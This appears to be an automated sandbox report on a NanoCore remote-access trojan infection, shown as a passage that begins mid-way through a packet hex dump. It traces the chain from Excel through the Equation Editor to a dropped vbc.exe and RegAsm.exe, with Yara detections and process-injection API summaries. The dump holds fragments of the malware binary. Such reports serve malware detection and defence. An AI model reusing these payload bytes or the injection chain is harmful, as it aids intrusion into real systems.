ff ff ff 7e 02 16 1d 39 05 00 00 00 38 0b 00 00 00 26 7b 03 00 00 04 38 06 00 00 00 26 38 f0 ff ff ff 2a 7e 02 1b 1a 39 05 00 00 00 38 0b 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL`(G `@ @PGK`` H.text' ( `.rsrc``@@.reloc2@BGHS ;20 8E})I8x(88t ~9&8:4 ~a:& 88/ ~{:&8( ~9p&8f:888((0&~~0t( ~!:& 88E 88 ~q:&89&&88}8~98&{8&8~98
Jun 9, 2021 08:04:57.205605984 CEST	3	IN	Data Raw: 00 00 26 7b 04 00 00 04 38 06 00 00 00 26 38 f0 ff ff ff 2a 13 30 04 00 80 00 00 00 01 00 00 11 20 01 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 03 00 00 00 4e 00 00 00 25 00 00 00 05 00 00 00 38 49 00 00 00 2a 38 fa ff ff ff 20 00 00 00 Data Ascii: &{8&80 8EN%8I8 ~:& 8:8!&& ~:& 88}8&~~0X8*s%~%98-&~s%9
Jun 9, 2021 08:04:57.205631018 CEST	4	IN	Data Raw: 00 00 00 00 fe 0c 03 00 45 05 00 00 00 01 02 00 00 d8 01 00 00 42 02 00 00 cb 01 00 00 f5 01 00 00 38 fc 01 00 00 00 73 0b 00 00 0a 13 00 38 00 00 00 00 00 11 00 20 00 01 00 00 28 1e 00 00 06 20 00 00 00 00 7e 5a 00 00 04 3a 0f 00 00 00 26 20 02 Data Ascii: EB8s8 ( ~Z:& 8E&!88!( [o(!8\io ~ :& 8E8o8(%8
Jun 9, 2021 08:04:57.205655098 CEST	6	IN	Data Raw: 2a 00 00 00 26 38 6d ff ff ff 38 0a 00 00 00 20 03 00 00 00 38 3c ff ff ff 73 21 00 00 0a 80 0f 00 00 04 38 8a ff ff ff 2a 38 fa ff ff ff 80 0c 00 00 04 20 04 00 00 00 7e 7b 00 00 04 3a 13 ff ff ff 26 20 04 00 00 00 38 08 ff ff ff 38 25 ff ff ff Data Ascii: &8m8 8<s!88 ~{:& 88%887 ~4:&80\| 8E-8(:%&:0 ~5:& 88&88rp*:&
Jun 9, 2021 08:04:57.205681086 CEST	7	IN	Data Raw: 00 dc 20 00 00 00 00 7e 35 00 00 04 39 6f fe ff ff 26 38 65 fe ff ff 11 05 02 28 3a 00 00 06 2a 11 04 2a 38 bb fe ff ff 20 05 00 00 00 38 4e fe ff ff 38 10 00 00 00 13 05 20 03 00 00 00 fe 0e 02 00 38 35 fe ff ff 11 05 02 28 3a 00 00 06 15 39 05 Data Ascii: ~59o&8e(:8 8N8 85(:98& 88y8qLuY;0K:&:&o+9+8&8&8:&(+8&80
Jun 9, 2021 08:04:57.205705881 CEST	8	IN	Data Raw: 38 04 00 00 00 fe 0c 02 00 45 01 00 00 00 05 00 00 00 38 00 00 00 00 11 05 28 38 00 00 0a 38 00 00 00 00 dc 20 05 00 00 00 7e 69 00 00 04 3a 32 fd ff ff 26 20 06 00 00 00 38 27 fd ff ff 11 01 14 28 3f 00 00 06 3a 8a fd ff ff 20 00 00 00 00 7e 46 Data Ascii: 8E8(88 ~i:2& 8'(?: ~F9& 8(>9r 88 ~M9&88&8P@K@0_8E8*(9@
Jun 9, 2021 08:04:57.205732107 CEST	10	IN	Data Raw: 00 00 00 26 28 03 00 00 0a 20 00 00 00 00 7e 2e 00 00 04 39 14 00 00 00 26 20 00 00 00 00 38 09 00 00 00 38 ce ff ff ff fe 0c 00 00 45 01 00 00 00 06 00 00 00 38 01 00 00 00 2a 38 fa ff ff ff 26 38 be ff ff ff 38 ef ff ff ff 00 00 00 06 2a 00 00 Data Ascii: &( ~.9& 88E88&88&~~0P:=&( ~{:& 88E88&88*&~~*0K:8
Jun 9, 2021 08:04:57.205756903 CEST	11	IN	Data Raw: 04 00 00 b6 04 00 00 96 05 00 00 46 07 00 00 4a 0c 00 00 98 06 00 00 75 05 00 00 8d 0e 00 00 19 06 00 00 38 03 00 00 8f 04 00 00 f3 02 00 00 8e 08 00 00 4f 0d 00 00 53 09 00 00 fd 03 00 00 ad 0e 00 00 c1 07 00 00 8c 00 00 00 73 08 00 00 96 09 00 Data Ascii: FJu8OSsb's0 NzLLYG&%of`
Jun 9, 2021 08:04:57.205785036 CEST	13	IN	Data Raw: 06 61 20 da f7 aa b5 61 80 32 00 00 04 20 05 00 00 00 28 81 00 00 06 3a 60 fa ff ff 26 20 01 00 00 00 38 55 fa ff ff 20 e4 d3 3a 6d 20 01 00 00 00 62 20 4a 8b 31 2e 59 20 e1 81 e1 98 61 80 68 00 00 04 38 6d 03 00 00 20 40 f3 91 f8 20 5d 8a 1c 05 Data Ascii: a a2 (:`& 8U :m b J1.Y ah8m @ ]Y huaj /8 #fe ra (:&8 #f lYf @A0a8: [X v:Y va08s 6 KY>Y a8A [X
Jun 9, 2021 08:04:57.205809116 CEST	14	IN	Data Raw: 41 00 00 04 20 21 00 00 00 28 82 00 00 06 39 2f f5 ff ff 26 38 25 f5 ff ff 20 0b 6f 49 d8 65 66 20 0a 6f 49 d8 61 80 6e 00 00 04 20 24 00 00 00 38 0d f5 ff ff 20 76 89 38 f9 65 20 0c 36 11 5f 61 80 8d 00 00 04 20 23 00 00 00 38 f2 f4 ff ff 20 50 Data Ascii: A !(9/&8% oIef oIan $8 v8e 6_a #8 P_f c k(a58M c a_8 Z c qa dXa^8 e 0Oaw (:z& 8o XAc X sa#8 f
Jun 9, 2021 08:04:57.342072964 CEST	16	IN	Data Raw: 55 7c 61 80 9a 00 00 04 20 2d 00 00 00 38 f6 ef ff ff 20 2d e7 26 81 20 71 13 7f 24 58 20 05 00 00 00 63 20 d4 2f 2d fd 61 80 42 00 00 04 20 33 00 00 00 38 d0 ef ff ff 20 c3 e9 4a af 66 20 eb 46 84 74 61 80 2d 00 00 04 20 38 00 00 00 38 b5 ef ff Data Ascii: U\|a -8 -& q$X c /-aB 38 Jf Fta- 88 -bte b %wa~ "(:&8 = b z=a68 rx5ef a8 Xm* b c Xm*aR 81 Q;? U{ae ~a: .

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 1108 Parent PID: 584

General

Start time:	08:04:44
Start date:	09/06/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13f3b0000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 1296 Parent PID: 584

General

Start time:	08:05:07
Start date:	09/06/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 1616 Parent PID: 1296

General

Start time:	08:05:09
Start date:	09/06/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0xdf0000
File size:	734208 bytes
MD5 hash:	EB43B3C033BD76B51B90A51A6726A81C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.2208102788.00000000022FC000.00000004.00000001.sdmp, Author: Florian Roth Rule: NanoCore, Description: unknown, Source: 00000004.00000002.2208102788.00000000022FC000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.2208200513.00000000032B1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.2208200513.00000000032B1000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000004.00000002.2208200513.00000000032B1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2207997590.0000000000DF2000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000000.2148408702.0000000000DF2000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2208071587.00000000022B1000.00000004.00000001.sdmp, Author: Joe Security Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.2208432610.0000000003526000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.2208432610.0000000003526000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000004.00000002.2208432610.0000000003526000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.2208264048.0000000003395000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.2208264048.0000000003395000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000004.00000002.2208264048.0000000003395000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\Public\vbc.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 30%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: RegAsm.exe PID: 2164 Parent PID: 1616

General

Start time:	08:05:36
Start date:	09/06/2021
Path:	C:\Users\user\AppData\Local\Temp\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\RegAsm.exe
Imagebase:	0x3c0000
File size:	64672 bytes
MD5 hash:	ADF76F395D5A0ECBBF005390B73C3FD2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2363768738.0000000000A40000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2363768738.0000000000A40000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2363611827.0000000000660000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2363611827.0000000000660000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2364015213.0000000000E80000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2364015213.0000000000E80000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2363776217.0000000000A50000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2363776217.0000000000A50000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2363541585.00000000005A0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2363541585.00000000005A0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2363994318.0000000000E10000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2363994318.0000000000E10000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2363897217.0000000000C10000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2363897217.0000000000C10000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2363890046.0000000000C00000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2363890046.0000000000C00000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2363636659.00000000006C0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2363636659.00000000006C0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2363548286.00000000005B0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2363548286.00000000005B0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2363938383.0000000000CB0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2363938383.0000000000CB0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2363468817.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.2363468817.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000005.00000002.2363468817.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000000.2206635485.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000000.2206635485.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000005.00000000.2206635485.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2363977064.0000000000DE0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2363977064.0000000000DE0000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.2363977064.0000000000DE0000.00000004.00000001.sdmp, Author: Joe Security Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2363557929.00000000005C0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2363557929.00000000005C0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000000.2207136655.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000000.2207136655.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000005.00000000.2207136655.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.2364567768.0000000002A21000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000005.00000002.2364567768.0000000002A21000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.2365764646.0000000003B49000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000005.00000002.2365764646.0000000003B49000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Antivirus matches:	Detection: 0%, Metadefender, Browse Detection: 0%, ReversingLabs
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: vbc.exe PID: 1616 Parent PID: 1296 vbc.exeCOMMON

Executed Functions

Function 042C63E8, Relevance: 2.3, Strings: 1, Instructions: 1020COMMON

Download Yara Rule

Strings

TVCm, xrefs: 042C65A5

Memory Dump Source

Source File: 00000004.00000002.2208606235.00000000042C0000.00000040.00000001.sdmp, Offset: 042C0000, based on PE: false

Similarity

API ID:
String ID: TVCm
API String ID: 0-3847034056
Opcode ID: 617a8248d4d521ac9360dc2035e52397cf9c03dad33d051dc440e3c35e4211e2
Instruction ID: c1a4e43004d5c6187a458be9e69bbc49b83afbf6096fc1c6faa766768f8f2927
Opcode Fuzzy Hash: 617a8248d4d521ac9360dc2035e52397cf9c03dad33d051dc440e3c35e4211e2
Instruction Fuzzy Hash: E4B2D875A00228CFDB64CF69C984BD9BBB2FF89304F1581E9D509AB265D731AE91CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00437685, Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,?,?), ref: 004376BF

Memory Dump Source

Source File: 00000004.00000002.2207654415.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID: ChildEnumWindows
String ID:
API String ID: 3555792229-0
Opcode ID: 8da17c6d8b57544aa0a777f8d3749c028a5d8dcfa5310323d29207bb7e6966df
Instruction ID: b0d21401ef70752963a4809b7097b5fcdf24a935a59f89c96511d8b845cf2810
Opcode Fuzzy Hash: 8da17c6d8b57544aa0a777f8d3749c028a5d8dcfa5310323d29207bb7e6966df
Instruction Fuzzy Hash: 5E11CDB9D052089FCF10CFA8E444AEDFBF1AB09314F24A45AE454B7250C339AA45CB68

Uniqueness

Uniqueness Score: -1.00%

Function 042C9E18, Relevance: 1.5, Strings: 1, Instructions: 229COMMON

Download Yara Rule

Strings

LCDm, xrefs: 042CA0D6

Memory Dump Source

Source File: 00000004.00000002.2208606235.00000000042C0000.00000040.00000001.sdmp, Offset: 042C0000, based on PE: false

Similarity

API ID:
String ID: LCDm
API String ID: 0-625777892
Opcode ID: 946546d519bd82ef75f4c821e1aefa422062ee378d75e60ab54f8074ac9cb1cd
Instruction ID: d5c44bb0a2ac4aa118e2271a54ff8650b3468e9f804c54707edbf8fbf98982ae
Opcode Fuzzy Hash: 946546d519bd82ef75f4c821e1aefa422062ee378d75e60ab54f8074ac9cb1cd
Instruction Fuzzy Hash: 95A16EB0E2820CCFDB00DFA5E54879EBBF1AB59304F10D95AD02967694E7B829C8DF51

Uniqueness

Uniqueness Score: -1.00%

Function 004301DD, Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207654415.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b4fc407b0d3ed6f390673e2e5c0e65006a34c300d37e2b4fd3139c3d5ba7684
Instruction ID: 935b06f5fc32a79e01be968544c46141304aa6c0c574a5ad2495b8cae03d0e96
Opcode Fuzzy Hash: 9b4fc407b0d3ed6f390673e2e5c0e65006a34c300d37e2b4fd3139c3d5ba7684
Instruction Fuzzy Hash: 6BA1D274905228CFDB64CF24D8987EABBB1BB49300F10A1DAD44EA3291DB785EC5DF09

Uniqueness

Uniqueness Score: -1.00%

Function 00437730, Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2207654415.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a48e2d2cac7f31f1967e79222a329dc7f444f8f9e256cd339720740575bceeb
Instruction ID: 0422e184930d44aac9d55241c377ae992049da66d6b61fcdb12720f38d78ffdf
Opcode Fuzzy Hash: 5a48e2d2cac7f31f1967e79222a329dc7f444f8f9e256cd339720740575bceeb
Instruction Fuzzy Hash: B22149B8D04219DFCB14CFA9D8859AEFBF1BB49320F14A16AE815B7360D734A941CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00435BA6, Relevance: 1.8, APIs: 1, Instructions: 324processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00435E77

Memory Dump Source

Source File: 00000004.00000002.2207654415.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: a7f9f18968aa218441bb82024096f6bddb3eb718ed652c2fb5b6994389a7ab6c
Instruction ID: ee016a89a2a562fa2beecea38c666cc4dbf897cded636dfa22a87fdbda96c229
Opcode Fuzzy Hash: a7f9f18968aa218441bb82024096f6bddb3eb718ed652c2fb5b6994389a7ab6c
Instruction Fuzzy Hash: BEC11471D0022D8FDB20CFA4C945BEEBBB1BF09304F1095AAE859B7250DB749A85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00435BB0, Relevance: 1.8, APIs: 1, Instructions: 321processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00435E77

Memory Dump Source

Source File: 00000004.00000002.2207654415.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 42949be11def879ba56c8761433f973f128fdee9fc1af42999b08a90c89509f8
Instruction ID: c214bef79a81365bc41f7a9c2ea7ea931b68e53e6bde225ff31058397431d19d
Opcode Fuzzy Hash: 42949be11def879ba56c8761433f973f128fdee9fc1af42999b08a90c89509f8
Instruction Fuzzy Hash: 47C11571D0022D8FDB20CFA4C945BEEBBB1BF09304F1095AAE859B7250DB749A85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00436D48, Relevance: 1.7, APIs: 1, Instructions: 158COMMON

Download Yara Rule

APIs

K32GetModuleBaseNameA.KERNEL32(?,?,?,?), ref: 00436EB7

Memory Dump Source

Source File: 00000004.00000002.2207654415.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID: BaseModuleName
String ID:
API String ID: 595626670-0
Opcode ID: 2518429ca6266794ee52893e99aaea1b1b3a4a921154cdb6e7d65e68c2f32d31
Instruction ID: 97dab9aa8aed1c142b4baa2e1c0e476f6f4dafe8f01cf2899015176f404dfb1c
Opcode Fuzzy Hash: 2518429ca6266794ee52893e99aaea1b1b3a4a921154cdb6e7d65e68c2f32d31
Instruction Fuzzy Hash: DF61BD74D04219AFCB14CFA9D985B9EFBF1BB49304F20912AE818AB350DB74A945CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004358BA, Relevance: 1.6, APIs: 1, Instructions: 132injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 004359CB

Memory Dump Source

Source File: 00000004.00000002.2207654415.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: e2e41d328ed04af7fcd872042f3d90f55b7641a44428652081894d9263ef4bd7
Instruction ID: e096001412de10bd8b1ad1f46c5e3b4a21dd868c537bb4b21fcb3c3e6284d554
Opcode Fuzzy Hash: e2e41d328ed04af7fcd872042f3d90f55b7641a44428652081894d9263ef4bd7
Instruction Fuzzy Hash: C541BDB4D052589FCB00CFA9D984AEEFBF1BF49314F24942AE418B7250D778A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 004358F0, Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 004359CB

Memory Dump Source

Source File: 00000004.00000002.2207654415.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: cd28eec96c2a5eee09588a49bed25679bd68bc77227f53055f7ba7a44d4cd468
Instruction ID: 5e29e633ccaba459f2c7ab6a6da81bc067e337f4ee11f69f30f6cf19a525d880
Opcode Fuzzy Hash: cd28eec96c2a5eee09588a49bed25679bd68bc77227f53055f7ba7a44d4cd468
Instruction Fuzzy Hash: 0941ABB5D012589FCF00CFA9D984AEEFBB1BF49314F24942AE814B7250D738AA45CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004358F8, Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 004359CB

Memory Dump Source

Source File: 00000004.00000002.2207654415.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 798eaa7ae2e1bd6fc3fe53cc20d73e1f97f128194deac8b34c1df748709406b5
Instruction ID: fd67be1da295769bce2a87e0756c27f3733ec146e9e8af67d86c5744ab1bdb22
Opcode Fuzzy Hash: 798eaa7ae2e1bd6fc3fe53cc20d73e1f97f128194deac8b34c1df748709406b5
Instruction Fuzzy Hash: DB419BB5D012589FCB00CFA9D984ADEFBB1BF49314F24942AE814B7210D778AA45CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00430DC1, Relevance: 1.6, APIs: 1, Instructions: 109fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(?,?,?), ref: 00430E9E

Memory Dump Source

Source File: 00000004.00000002.2207654415.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 213ae0928b1d84eb375abaca436da129f0cf4e2990ef685def030fb0d30afe9f
Instruction ID: 867e2d3713e431bf7df0ea66aa3d9f6035cabd426177f3c451b48b732da7f1e1
Opcode Fuzzy Hash: 213ae0928b1d84eb375abaca436da129f0cf4e2990ef685def030fb0d30afe9f
Instruction Fuzzy Hash: FF41BCB4D04258DFCB10CFAAD484AEEFBF1AB49314F14946AE458B7260D3389A86CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00430DC8, Relevance: 1.6, APIs: 1, Instructions: 107fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(?,?,?), ref: 00430E9E

Memory Dump Source

Source File: 00000004.00000002.2207654415.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 1110f26c7c61bae89de088beed7a73ad3bbf0083a8e5611181da20dbff593af1
Instruction ID: 11e9f4e217f479c232a773ec9d4a8faeb502a7cc3213f30bc2d67384bed7f00b
Opcode Fuzzy Hash: 1110f26c7c61bae89de088beed7a73ad3bbf0083a8e5611181da20dbff593af1
Instruction Fuzzy Hash: 7541AEB4D04258DFCB10CFAAD484AEEFBF5BB49310F14946AE458B7260D338AA45CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00436198, Relevance: 1.6, APIs: 1, Instructions: 106COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0043624A

Memory Dump Source

Source File: 00000004.00000002.2207654415.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 4906d5e74cea260d05508e9cadbb827c4f5c68b2e1b035104917e0e3f05870e4
Instruction ID: c00feb3d1970fcdc7eee93b3686e903f82805e44c2d82613dec6bf0d1f72809a
Opcode Fuzzy Hash: 4906d5e74cea260d05508e9cadbb827c4f5c68b2e1b035104917e0e3f05870e4
Instruction Fuzzy Hash: A8419CB5D042589FCF00CFE9D984AEEFBB5BB49310F14A42AE815B7200D779A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 004357A0, Relevance: 1.6, APIs: 1, Instructions: 105memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00435852

Memory Dump Source

Source File: 00000004.00000002.2207654415.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 735387198d678e6827e99299afb73e3fbf76caa979f61bb9a624a655da110a6b
